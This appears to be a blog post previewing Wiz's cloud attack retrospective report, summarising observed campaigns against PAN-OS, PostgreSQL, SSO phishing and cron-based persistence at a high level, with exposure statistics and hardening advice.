Cloud environments are growing more complex—but attackers aren’t necessarily getting more advanced. Instead, they’re applying creativity to familiar weaknesses: misconfigurations, unpatched systems, and credential misuse.
That’s the key theme in Wiz’s newly released Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025, a data-driven analysis of real-world cloud attacks based on detections across thousands of environments. The report maps eight of the most frequently observed MITRE ATT&CK techniques to specific threat campaigns, CVEs, and persistent trends across the cloud ecosystem.
Here’s a preview of what stood out:
Following the disclosure of CVE-2024-0012 and CVE-2024-9474 in PAN-OS, Wiz observed attackers deploying web shells and Sliver implants just days after PoCs went public.
24% of monitored environments contained vulnerable PAN-OS appliances
7% were internet-facing and exploitable via unauthenticated RCE
These cases show how quickly attackers pivot from disclosure to exploitation—especially when edge infrastructure is exposed.
The CPU_HU campaign targeted weak PostgreSQL configurations, exploiting default or guessable credentials to deploy cryptominers.
90% of cloud environments analyzed use self-managed PostgreSQL
Nearly one-third had at least one instance exposed publicly
This underscores how foundational hardening steps—like restricting access and enforcing credential policies—remain critical.
Phishing remains the top cause of identity-based cloud breaches.
0ktapus used spoofed SSO portals to harvest credentials
Atlas Lion employed adversary-in-the-middle proxies and smishing to bypass MFA
Even with modern defenses, user-targeted phishing continues to yield high success rates in cloud environments.
Persistence is no longer an afterthought—it’s embedded from the start.
In Redis and Jenkins environments, attackers used cron jobs to relaunch cryptominers on reboot
Selenium Grid instances without authentication were abused to execute payloads via browser automation
Simple, resilient techniques continue to evade detection—especially when deployed on services with limited monitoring.
What’s inside the full report?
The Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025 includes:
Detailed analysis of the top MITRE ATT&CK techniques abused by actors in the cloud
Real-world incidents tied to specific CVEs, misconfigurations, and IAM abuse
Campaigns involving Diicot, Bapak, 0ktapus, and more
Practical guidance on how to detect and disrupt attack chains in your environment
